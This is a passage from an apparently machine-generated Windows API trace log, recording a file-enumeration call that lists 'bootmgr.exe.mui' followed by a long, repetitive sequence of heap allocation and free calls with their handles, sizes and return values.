nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.770] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0165.770] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0165.770] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.770] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.770] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c200 | out: hHeap=0xcd0000) returned 1 [0165.770] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c200 [0165.770] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.770] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.770] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.770] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.771] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.771] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.771] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.771] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.771] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.771] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.771] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.771] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.771] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.771] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.771] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.771] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.771] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.771] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.771] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.771] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.771] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.771] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.771] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.771] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.771] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.771] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.771] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.771] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.771] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.771] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.771] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.771] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.771] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.771] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.771] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.771] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.771] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.771] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.771] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.771] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.771] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.771] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.772] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.772] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.772] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.772] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.772] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.772] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.772] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.772] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.772] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.772] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.772] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.772] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.772] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.772] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.772] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.772] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.772] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.772] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.772] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.772] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.772] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.772] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.773] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.773] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.773] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.773] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.773] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.773] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.773] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.773] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.773] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.773] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.773] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.774] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.774] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.774] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.774] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.774] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.774] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.775] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.775] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.775] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.775] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.775] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.775] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.775] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.775] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.775] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.775] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.775] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.775] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.775] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.775] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.775] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.775] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.775] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.775] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.776] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.776] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.776] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.776] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.776] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.776] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.776] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.776] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.776] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.776] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.776] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.776] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.776] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.776] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.776] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.776] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.776] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.776] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.776] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.776] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.776] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.776] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.776] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.776] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.776] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.776] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.776] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.776] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.776] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.776] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.776] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.776] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.776] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.776] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.777] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.777] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.777] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.777] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.777] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.778] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.778] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.778] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.778] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.778] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.778] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.778] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.778] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.778] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.779] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.779] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.779] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.779] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.779] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.779] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.779] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.779] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.779] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.779] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.779] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.779] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.779] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.779] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.779] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.779] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.779] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.779] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.779] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.779] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.779] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.779] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.779] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.779] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.779] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.779] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.779] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.779] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.779] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.779] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.779] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.779] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.779] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.779] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.779] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.780] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.780] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.780] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.780] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.780] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.780] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.780] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.780] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.780] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.780] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: 